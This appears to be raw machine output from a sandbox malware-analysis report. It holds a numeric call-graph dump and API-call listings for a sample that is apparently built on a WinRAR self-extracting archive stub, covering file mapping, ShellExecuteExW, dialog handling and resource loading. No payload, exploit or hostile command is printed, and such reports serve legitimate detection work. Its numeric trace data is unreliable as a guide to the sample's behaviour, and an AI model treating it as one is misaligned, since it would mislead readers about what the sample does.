24854->24855 24856 4f917 53 API calls 24855->24856 24857 52057 24856->24857 24857->24847 24858->24656 24860 51b14 2 API calls 24859->24860 24861 5bcff OleInitialize 24860->24861 24862 5bd22 GdiplusStartup SHGetMalloc 24861->24862 24862->24658 24864 5c78e 24863->24864 24865 5c79b GetObjectW 24863->24865 24917 5b6a2 FindResourceW 24864->24917 24869 5c7aa 24865->24869 24912 5b5a6 24869->24912 24871 5c800 24882 4ed42 24871->24882 24872 5c7dc 24931 5b5e5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24872->24931 24873 5b6a2 12 API calls 24875 5c7cd 24873->24875 24875->24872 24877 5c7d3 DeleteObject 24875->24877 24876 5c7e4 24932 5b5c4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24876->24932 24877->24872 24879 5c7ed 24933 5b7ec 8 API calls 24879->24933 24881 5c7f4 DeleteObject 24881->24871 24944 4ed67 24882->24944 24887 5a0a7 24888 5fd0e 27 API calls 24887->24888 24889 5a0c6 24888->24889 24889->24681 24891 5bd80 GdiplusShutdown OleUninitialize 24890->24891 24891->24700 24893->24664 24894->24680 24895->24684 24896->24687 24897->24660 24898->24691 24899->24699 24901 4c60d GetVersionExW 24900->24901 24902 4c649 24900->24902 24901->24902 24902->24826 24904 5fe20 24903->24904 24905 51b21 GetSystemDirectoryW 24904->24905 24906 51b57 24905->24906 24907 51b39 24905->24907 24906->24826 24908 51b4a LoadLibraryW 24907->24908 24908->24906 24909->24820 24911 64dfb 24910->24911 24911->24851 24911->24911 24934 5b5c4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24912->24934 24914 5b5ad 24915 5b5b9 24914->24915 24935 5b5e5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24914->24935 24915->24871 24915->24872 24915->24873 24918 5b6c5 SizeofResource 24917->24918 24919 5b7b3 24917->24919 24918->24919 24920 5b6dc LoadResource 24918->24920 24919->24865 24919->24869 24920->24919 24921 5b6f1 LockResource 24920->24921 24921->24919 24922 5b702 GlobalAlloc 24921->24922 24922->24919 24923 5b71d GlobalLock 24922->24923 24924 5b7ac GlobalFree 24923->24924 24925 5b72c __InternalCxxFrameHandler 24923->24925 
24924->24919 24926 5b7a5 GlobalUnlock 24925->24926 24936 5b606 GdipAlloc 24925->24936 24926->24924 24929 5b790 24929->24926 24930 5b77a GdipCreateHBITMAPFromBitmap 24930->24929 24931->24876 24932->24879 24933->24881 24934->24914 24935->24915 24937 5b625 24936->24937 24938 5b618 24936->24938 24937->24926 24937->24929 24937->24930 24940 5b398 24938->24940 24941 5b3c0 GdipCreateBitmapFromStream 24940->24941 24942 5b3b9 GdipCreateBitmapFromStreamICM 24940->24942 24943 5b3c5 24941->24943 24942->24943 24943->24937 24945 4ed75 __EH_prolog 24944->24945 24946 4eda4 GetModuleFileNameW 24945->24946 24947 4edd5 24945->24947 24948 4edbe 24946->24948 24990 4ab20 24947->24990 24948->24947 24950 4ee31 25001 67580 24950->25001 24952 4f561 78 API calls 24955 4ee05 24952->24955 24955->24950 24955->24952 24968 4f04a 24955->24968 24956 4ee44 24957 67580 26 API calls 24956->24957 24965 4ee56 ___vcrt_FlsSetValue 24957->24965 24958 4ef85 24958->24968 25028 4afe0 81 API calls 24958->25028 24960 4b0f0 79 API calls 24960->24965 24962 4ef9f ___std_exception_copy 24963 4ae40 82 API calls 24962->24963 24962->24968 24966 4efc8 ___std_exception_copy 24963->24966 24965->24958 24965->24960 24965->24968 25022 4ae40 24965->25022 25027 4afe0 81 API calls 24965->25027 24966->24968 24985 4efd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 24966->24985 25029 52ea2 MultiByteToWideChar 24966->25029 25015 4a7df 24968->25015 24969 4f459 24975 4f4de 24969->24975 25035 69eee 26 API calls 2 library calls 24969->25035 24972 4f46e 25036 68868 26 API calls 2 library calls 24972->25036 24973 4f4c6 25037 4f57c 78 API calls 24973->25037 24974 4f514 24977 67580 26 API calls 24974->24977 24975->24974 24981 4f561 78 API calls 24975->24981 24979 4f52d 24977->24979 24980 67580 26 API calls 24979->24980 24980->24968 24981->24975 24984 530c5 WideCharToMultiByte 24984->24985 24985->24968 24985->24969 24985->24984 25030 4f8b1 50 API calls __vsnprintf 24985->25030 25031 673c1 26 API calls 3 library calls 24985->25031 25032 
69eee 26 API calls 2 library calls 24985->25032 25033 68868 26 API calls 2 library calls 24985->25033 25034 4f57c 78 API calls 24985->25034 24988 4f59e GetModuleHandleW FindResourceW 24989 4ed55 24988->24989 24989->24887 24991 4ab2a 24990->24991 24992 4ab8b CreateFileW 24991->24992 24993 4abac GetLastError 24992->24993 24997 4abfb 24992->24997 24994 4cf12 GetCurrentDirectoryW 24993->24994 24995 4abcc 24994->24995 24996 4abd0 CreateFileW GetLastError 24995->24996 24995->24997 24996->24997 24999 4abf5 24996->24999 24998 4ac3f 24997->24998 25000 4ac25 SetFileTime 24997->25000 24998->24955 24999->24997 25000->24998 25002 675b9 25001->25002 25003 675bd 25002->25003 25014 675e5 25002->25014 25038 6a63b 20 API calls _abort 25003->25038 25005 675c2 25039 65009 26 API calls _abort 25005->25039 25006 67909 25008 60bcc _ValidateLocalCookies 5 API calls 25006->25008 25010 67916 25008->25010 25009 675cd 25011 60bcc _ValidateLocalCookies 5 API calls 25009->25011 25010->24956 25013 675d9 25011->25013 25013->24956 25014->25006 25040 674a0 5 API calls _ValidateLocalCookies 25014->25040 25016 4a803 25015->25016 25017 4a814 25015->25017 25016->25017 25018 4a816 25016->25018 25019 4a80f 25016->25019 25017->24988 25046 4a860 25018->25046 25041 4a98e 25019->25041 25023 4ae4c 25022->25023 25025 4ae53 25022->25025 25023->24965 25025->25023 25026 4a9c5 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25025->25026 25061 4779d 77 API calls 25025->25061 25026->25025 25027->24965 25028->24962 25029->24985 25030->24985 25031->24985 25032->24985 25033->24985 25034->24985 25035->24972 25036->24973 25037->24975 25038->25005 25039->25009 25040->25014 25042 4a997 25041->25042 25043 4a9c1 25041->25043 25042->25043 25052 4b450 25042->25052 25043->25017 25047 4a86c 25046->25047 25048 4a88a 25046->25048 25047->25048 25050 4a878 FindCloseChangeNotification 25047->25050 25049 4a8a9 25048->25049 25060 47665 76 API calls 25048->25060 25049->25017 25050->25048 25053 5fe20 25052->25053 25054 4b45d 
DeleteFileW 25053->25054 25055 4b470 25054->25055 25056 4a9bf 25054->25056 25057 4cf12 GetCurrentDirectoryW 25055->25057 25056->25017 25058 4b484 25057->25058 25058->25056 25059 4b488 DeleteFileW 25058->25059 25059->25056 25060->25049 25061->25025 25063 68ef3 _abort 25062->25063 25064 68f0c 25063->25064 25065 68efa 25063->25065 25086 6bc41 EnterCriticalSection 25064->25086 25098 69041 GetModuleHandleW 25065->25098 25068 68eff 25068->25064 25099 69085 GetModuleHandleExW 25068->25099 25072 68f13 25074 68f88 25072->25074 25084 68fb1 25072->25084 25107 69a00 20 API calls _abort 25072->25107 25075 68fa0 25074->25075 25080 69cb1 _abort 5 API calls 25074->25080 25081 69cb1 _abort 5 API calls 25075->25081 25076 68fce 25090 69000 25076->25090 25077 68ffa 25108 733a0 5 API calls _ValidateLocalCookies 25077->25108 25080->25075 25081->25084 25087 68ff1 25084->25087 25086->25072 25109 6bc91 LeaveCriticalSection 25087->25109 25089 68fca 25089->25076 25089->25077 25110 6c086 25090->25110 25093 6902e 25096 69085 _abort 8 API calls 25093->25096 25094 6900e GetPEB 25094->25093 25095 6901e GetCurrentProcess TerminateProcess 25094->25095 25095->25093 25097 69036 ExitProcess 25096->25097 25098->25068 25100 690d2 25099->25100 25101 690af GetProcAddress 25099->25101 25103 690e1 25100->25103 25104 690d8 FreeLibrary 25100->25104 25102 690c4 25101->25102 25102->25100 25105 60bcc _ValidateLocalCookies 5 API calls 25103->25105 25104->25103 25106 68f0b 25105->25106 25106->25064 25107->25074 25109->25089 25111 6c0a1 25110->25111 25112 6c0ab 25110->25112 25114 60bcc _ValidateLocalCookies 5 API calls 25111->25114 25113 6bca8 _abort 5 API calls 25112->25113 25113->25111 25115 6900a 25114->25115 25115->25093 25115->25094 26055 5b060 28 API calls 25116 6d061 31 API calls _ValidateLocalCookies 25135 41075 25136 504c5 41 API calls 25135->25136 25137 4107a 25136->25137 25140 601c2 29 API calls 25137->25140 25139 41084 25140->25139 26056 5ec71 DialogBoxParamW 26080 42570 96 API calls 25141 5c870 25142 
5c87a __EH_prolog 25141->25142 25309 412f6 25142->25309 25145 5c8d1 25146 5cf91 25374 5e66e 25146->25374 25147 5c8ba 25147->25145 25149 5c8c8 25147->25149 25150 5c92b 25147->25150 25153 5c8cc 25149->25153 25154 5c908 25149->25154 25152 5c9be GetDlgItemTextW 25150->25152 25157 5c941 25150->25157 25152->25154 25160 5c9fb 25152->25160 25153->25145 25164 4f917 53 API calls 25153->25164 25154->25145 25161 5c9ef EndDialog 25154->25161 25155 5cfac SendMessageW 25156 5cfba 25155->25156 25158 5cfd4 GetDlgItem SendMessageW 25156->25158 25159 5cfc3 SendDlgItemMessageW 25156->25159 25163 4f917 53 API calls 25157->25163 25392 5b62d GetCurrentDirectoryW 25158->25392 25159->25158 25162 5ca10 GetDlgItem 25160->25162 25307 5ca04 25160->25307 25161->25145 25166 5ca24 SendMessageW SendMessageW 25162->25166 25167 5ca47 SetFocus 25162->25167 25168 5c95e SetDlgItemTextW 25163->25168 25169 5c8eb 25164->25169 25166->25167 25173 5ca57 25167->25173 25184 5ca70 25167->25184 25174 5c969 25168->25174 25412 4122f SHGetMalloc 25169->25412 25170 5d004 GetDlgItem 25171 5d027 SetWindowTextW 25170->25171 25172 5d021 25170->25172 25393 5bb90 GetClassNameW 25171->25393 25172->25171 25178 4f917 53 API calls 25173->25178 25174->25145 25182 5c976 GetMessageW 25174->25182 25176 5ced7 25180 4f917 53 API calls 25176->25180 25183 5ca61 25178->25183 25179 5c8f2 25179->25145 25185 5d27e SetDlgItemTextW 25179->25185 25186 5cee7 SetDlgItemTextW 25180->25186 25182->25145 25188 5c98d IsDialogMessageW 25182->25188 25413 5e496 25183->25413 25191 4f917 53 API calls 25184->25191 25185->25145 25192 5cefb 25186->25192 25188->25174 25190 5c99c TranslateMessage DispatchMessageW 25188->25190 25190->25174 25194 5caa7 25191->25194 25195 4f917 53 API calls 25192->25195 25197 44a00 _swprintf 51 API calls 25194->25197 25231 5cf1e _wcslen 25195->25231 25196 5d072 25200 5d0a2 25196->25200 25203 4f917 53 API calls 25196->25203 25202 5cab9 25197->25202 25198 5d701 97 API calls 25198->25196 25199 5ca69 25319 4b321 25199->25319 25205 
5d701 97 API calls 25200->25205 25262 5d15a 25200->25262 25207 5e496 16 API calls 25202->25207 25208 5d085 SetDlgItemTextW 25203->25208 25212 5d0bd 25205->25212 25206 5d20d 25213 5d216 EnableWindow 25206->25213 25214 5d21f 25206->25214 25207->25199 25216 4f917 53 API calls 25208->25216 25209 5caf8 GetLastError 25210 5cb03 25209->25210 25325 5bbe9 SetCurrentDirectoryW 25210->25325 25224 5d0cf 25212->25224 25253 5d0f4 25212->25253 25213->25214 25219 5d23c 25214->25219 25431 412b3 GetDlgItem EnableWindow 25214->25431 25215 5cf6f 25218 4f917 53 API calls 25215->25218 25220 5d099 SetDlgItemTextW 25216->25220 25217 5cb17 25222 5cb2e 25217->25222 25223 5cb20 GetLastError 25217->25223 25218->25145 25221 5d263 25219->25221 25232 5d25b SendMessageW 25219->25232 25220->25200 25221->25145 25233 4f917 53 API calls 25221->25233 25228 5cba1 25222->25228 25234 5cb3e GetTickCount 25222->25234 25235 5cbb0 25222->25235 25223->25222 25429 5aec5 32 API calls 25224->25429 25225 5d14d 25227 5d701 97 API calls 25225->25227 25227->25262 25228->25235 25237 5cdd8 25228->25237 25230 5d232 25432 412b3 GetDlgItem EnableWindow 25230->25432 25231->25215 25236 4f917 53 API calls 25231->25236 25232->25221 25233->25179 25241 44a00 _swprintf 51 API calls 25234->25241 25244 5cd7d 25235->25244 25245 5cd73 25235->25245 25246 5cbc9 GetModuleFileNameW 25235->25246 25242 5cf52 25236->25242 25334 412d1 GetDlgItem ShowWindow 25237->25334 25238 5d0e8 25238->25253 25248 5cb57 25241->25248 25249 44a00 _swprintf 51 API calls 25242->25249 25243 5d1eb 25430 5aec5 32 API calls 25243->25430 25252 4f917 53 API calls 25244->25252 25245->25154 25245->25244 25423 505c6 82 API calls 25246->25423 25247 5cde8 25335 412d1 GetDlgItem ShowWindow 25247->25335 25326 4a8ae 25248->25326 25249->25215 25259 5cd87 25252->25259 25253->25225 25254 5d701 97 API calls 25253->25254 25260 5d122 25254->25260 25256 4f917 53 API calls 25256->25262 25257 5d20a 25257->25206 25258 5cbed 25263 44a00 _swprintf 51 API calls 25258->25263 25264 
44a00 _swprintf 51 API calls 25259->25264 25260->25225 25265 5d12b DialogBoxParamW 25260->25265 25261 5cdf2 25266 4f917 53 API calls 25261->25266 25262->25206 25262->25243 25262->25256 25268 5cc0f CreateFileMappingW 25263->25268 25269 5cda5 25264->25269 25265->25154 25265->25225 25270 5cdfc SetDlgItemTextW 25266->25270 25272 5cc6d GetCommandLineW 25268->25272 25301 5cce4 __InternalCxxFrameHandler 25268->25301 25278 4f917 53 API calls 25269->25278 25336 412d1 GetDlgItem ShowWindow 25270->25336 25271 5cb7d 25275 5cb84 GetLastError 25271->25275 25276 5cb8f 25271->25276 25277 5cc7e 25272->25277 25273 5ccef ShellExecuteExW 25299 5cd0a 25273->25299 25275->25276 25280 4a7df 80 API calls 25276->25280 25424 5c4b5 SHGetMalloc 25277->25424 25283 5cdbf 25278->25283 25279 5ce0e SetDlgItemTextW GetDlgItem 25284 5ce43 25279->25284 25285 5ce2b GetWindowLongW SetWindowLongW 25279->25285 25280->25228 25282 5cc9a 25425 5c4b5 SHGetMalloc 25282->25425 25337 5d701 25284->25337 25285->25284 25288 5cca6 25426 5c4b5 SHGetMalloc 25288->25426 25291 5cd4d 25291->25245 25297 5cd63 UnmapViewOfFile CloseHandle 25291->25297 25292 5d701 97 API calls 25294 5ce5f 25292->25294 25293 5ccb2 25427 50675 82 API calls 25293->25427 25362 5ea22 25294->25362 25297->25245 25298 5ccc3 MapViewOfFile 25298->25301 25299->25291 25302 5cd39 Sleep 25299->25302 25301->25273 25302->25291 25302->25299 25303 5d701 97 API calls 25306 5ce85 25303->25306 25304 5ceae 25428 412b3 GetDlgItem EnableWindow 25304->25428 25306->25304 25308 5d701 97 API calls 25306->25308 25307->25154 25307->25176 25308->25304 25310 412ff 25309->25310 25311 41358 25309->25311 25313 41365 25310->25313 25433 4f5e8 62 API calls 2 library calls 25310->25433 25434 4f5c1 GetWindowLongW SetWindowLongW 25311->25434 25313->25145 25313->25146 25313->25147 25315 41321 25315->25313 25316 41334 GetDlgItem 25315->25316 25316->25313 25317 41344 25316->25317 25317->25313 25318 4134a SetWindowTextW 25317->25318 25318->25313 25322 4b32b 25319->25322 25320 4b3e5 

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00051B5C: GetModuleHandleW.KERNEL32(kernel32), ref: 00051B75
                                                              • Part of subcall function 00051B5C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00051B87
                                                              • Part of subcall function 00051B5C: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00051BB8
                                                              • Part of subcall function 0005B62D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0005B635
                                                              • Part of subcall function 0005BCEB: OleInitialize.OLE32(00000000), ref: 0005BD04
                                                              • Part of subcall function 0005BCEB: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0005BD3B
                                                              • Part of subcall function 0005BCEB: SHGetMalloc.SHELL32(0008A460), ref: 0005BD45
                                                            • GetCommandLineW.KERNEL32 ref: 0005EF1B
                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0005EF45
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 0005EF56
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0005EFA7
                                                              • Part of subcall function 0005EBAE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0005EBC4
                                                              • Part of subcall function 0005EBAE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0005EC00
                                                              • Part of subcall function 0005072B: _wcslen.LIBCMT ref: 0005074F
                                                            • CloseHandle.KERNEL32(00000000), ref: 0005EFAE
                                                            • GetModuleFileNameW.KERNEL32(00000000,000A0CC0,00000800), ref: 0005EFC8
                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,000A0CC0), ref: 0005EFD4
                                                            • GetLocalTime.KERNEL32(?), ref: 0005EFDF
                                                            • _swprintf.LIBCMT ref: 0005F01E
                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0005F033
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0005F03A
                                                            • LoadIconW.USER32(00000000,00000064), ref: 0005F051
                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C870,00000000), ref: 0005F0A2
                                                            • Sleep.KERNEL32(?), ref: 0005F0D0
                                                            • DeleteObject.GDI32 ref: 0005F109
                                                            • DeleteObject.GDI32(?), ref: 0005F119
                                                            • CloseHandle.KERNEL32 ref: 0005F15C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                            • API String ID: 3014515783-3710569615
                                                            • Opcode ID: 59a943ba911fb5bcb1657fc80f262c61d8ad08eca8bfae91d7d18d252f684307
                                                            • Instruction ID: a7d73f8df57034d4d66d688306e08a9716edd4b1497ad916f92bb17a158db0cf
                                                            • Opcode Fuzzy Hash: 59a943ba911fb5bcb1657fc80f262c61d8ad08eca8bfae91d7d18d252f684307
                                                            • Instruction Fuzzy Hash: DA61E871900741ABF310AB61DC49FBB7BDCBB46746F040425FA85A2192EF7C9948CB62

                                                            Control-flow Graph

                                                            APIs
                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0005C7CD,00000066), ref: 0005B6B5
                                                            • SizeofResource.KERNEL32(00000000,?,?,?,0005C7CD,00000066), ref: 0005B6CC
                                                            • LoadResource.KERNEL32(00000000,?,?,?,0005C7CD,00000066), ref: 0005B6E3
                                                            • LockResource.KERNEL32(00000000,?,?,?,0005C7CD,00000066), ref: 0005B6F2
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0005C7CD,00000066), ref: 0005B70D
                                                            • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0005C7CD,00000066), ref: 0005B71E
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0005B7A6
                                                              • Part of subcall function 0005B606: GdipAlloc.GDIPLUS(00000010), ref: 0005B60C
                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0005B787
                                                            • GlobalFree.KERNEL32(00000000), ref: 0005B7AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                            • String ID: PNG
                                                            • API String ID: 541704414-364855578

                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BA9D
                                                              • Part of subcall function 0004CF12: _wcslen.LIBCMT ref: 0004CF36
                                                            • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BACB
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BAD7
                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BB01
                                                            • GetLastError.KERNEL32(?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BB0D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                            • String ID:
                                                            • API String ID: 42610566-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000492AB
                                                              • Part of subcall function 0004D636: _wcsrchr.LIBVCRUNTIME ref: 0004D640
                                                              • Part of subcall function 0004CA80: _wcslen.LIBCMT ref: 0004CA86
                                                              • Part of subcall function 000518E0: _wcslen.LIBCMT ref: 000518E6
                                                              • Part of subcall function 0004B5B6: _wcslen.LIBCMT ref: 0004B5C2
                                                              • Part of subcall function 0004B5B6: __aulldiv.LIBCMT ref: 0004B5EE
                                                              • Part of subcall function 0004B5B6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0004B5F5
                                                              • Part of subcall function 0004B5B6: _swprintf.LIBCMT ref: 0004B620
                                                              • Part of subcall function 0004B5B6: _wcslen.LIBCMT ref: 0004B62A
                                                              • Part of subcall function 0004B5B6: _swprintf.LIBCMT ref: 0004B680
                                                              • Part of subcall function 0004B5B6: _wcslen.LIBCMT ref: 0004B68A
                                                              • Part of subcall function 00044710: __EH_prolog.LIBCMT ref: 00044715
                                                              • Part of subcall function 0004A1F0: __EH_prolog.LIBCMT ref: 0004A1F5
                                                              • Part of subcall function 0004B8C6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B8DA
                                                              • Part of subcall function 0004B8C6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B90B
                                                            Strings
                                                            • __tmp_reference_source_, xrefs: 00049576
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
                                                            • String ID: __tmp_reference_source_
                                                            • API String ID: 70197177-685763994
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,00068FD6,?,0007D570,0000000C,0006912D,?,00000002,00000000), ref: 00069021
                                                            • TerminateProcess.KERNEL32(00000000,?,00068FD6,?,0007D570,0000000C,0006912D,?,00000002,00000000), ref: 00069028
                                                            • ExitProcess.KERNEL32 ref: 0006903A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0005C875
                                                              • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
                                                              • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005C961
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005C97F
                                                            • IsDialogMessageW.USER32(?,?), ref: 0005C992
                                                            • TranslateMessage.USER32(?), ref: 0005C9A0
                                                            • DispatchMessageW.USER32(?), ref: 0005C9AA
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0005C9CD
                                                            • EndDialog.USER32(?,00000001), ref: 0005C9F0
                                                            • GetDlgItem.USER32(?,00000068), ref: 0005CA13
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005CA2E
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,000745F4), ref: 0005CA41
                                                              • Part of subcall function 0005E415: _wcslen.LIBCMT ref: 0005E43F
                                                            • SetFocus.USER32(00000000), ref: 0005CA48
                                                            • _swprintf.LIBCMT ref: 0005CAB4
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                              • Part of subcall function 0005E496: GetDlgItem.USER32(00000068,000A1CF0), ref: 0005E4AA
                                                              • Part of subcall function 0005E496: ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,0005C849,000760F0,000A1CF0,000A1CF0,00001000,000830C4,00000000,?), ref: 0005E4D2
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005E4DD
